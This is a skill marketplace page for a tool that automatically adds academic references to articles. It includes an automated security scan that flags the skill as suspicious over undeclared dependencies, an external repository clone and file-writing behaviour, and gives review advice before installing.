Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
自动为文章添加参考文献
v1.0.0自动为学术文章添加参考文献。解析文章内容提取主题和关键词, 调用 academic-search 检索相关论文,推荐候选文献供用户确认, 自动插入格式化的引用。支持 Markdown/LaTeX/Word 输入, 输出 BibTeX/GB/T 7714/APA 格式。当用户说"帮我加参考文献"、 "给这篇文章找引...
⭐ 0· 46·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The skill's name/description (auto-add citations) matches the included scripts (parse, format, insert). However the registry metadata declares no runtime dependencies or env vars while SKILL.md and README instruct the user to git-clone a separate academic-search skill and to pip-install python packages (python-docx, textract). The absence of those required dependencies in the metadata is an inconsistency and reduces transparency.
Instruction Scope
SKILL.md instructs running local Python scripts that read and overwrite user documents (backups are made). That is consistent with the stated purpose. It also instructs cloning and invoking an external academic-search skill for retrieval; that external component will perform network access and search actions (arXiv, Semantic Scholar, Google Scholar, CNKI). The skill's instructions do not attempt to read credentials or unrelated system files, but they do write to ~/.cursor/skills/academic-search (per the clone command) and to document directories (.bib, backups), so users should expect filesystem and network activity.
Install Mechanism
No formal install spec is provided in the registry, yet SKILL.md / README direct the user to run git clone for academic-search and pip install python-docx textract. Pulling an external GitHub repo and installing textract (which can require native dependencies) are non-trivial installs. The skill does not declare or pin versions and relies on a third-party repository (ustc-ai4science/academic-search) whose check-deps.sh should be inspected; this is a higher-risk install pattern than a purely instruction-only skill.
Credentials
No sensitive environment variables or credentials are declared as required. SKILL.md/README mention optional env vars for styling (AUTO_CITATION_STYLE, YEAR_RANGE, CANDIDATES) which are harmless. However, the academic-search dependency (not declared in metadata) may itself require API keys or browser automation to access Google Scholar/CNKI — those requirements are not surfaced here and should be checked in that dependency's docs and check-deps.sh.
Persistence & Privilege
The skill does not request 'always: true' and does not modify other skills or global agent settings. It will create/modify files in the user's document directories and create backups; that's appropriate for an insertion tool and matches the stated behavior.
What to consider before installing
This skill's code implements parsing, formatting, and insertion of citations and aligns with its description, but before installing you should: 1) Inspect the academic-search repository referenced in SKILL.md (especially scripts/check-deps.sh) — it may install browser automation or require API keys for Google Scholar / CNKI / other platforms. 2) Be aware the README asks you to git-clone repositories into ~/.cursor/skills and to pip-install python-docx and textract (textract often needs native libraries); ensure you trust those sources and run installs in a controlled environment. 3) Review the Python scripts yourself (they read and overwrite documents and create backups) and test on non-sensitive sample files. 4) If you need to avoid network scraping or extra credentials, ask the author how academic-search will authenticate and whether it can be restricted to only arXiv/Semantic Scholar APIs. 5) The registry metadata does not list the runtime dependencies — ask the publisher to update metadata to include required packages and any external credentials so you can make a fully informed decision.Like a lobster shell, security has layers — review code before you run it.
latestvk973q7pzq6z9qtgkqd0yqwr6cx84n402
License
MIT-0
Free to use, modify, and redistribute. No attribution required.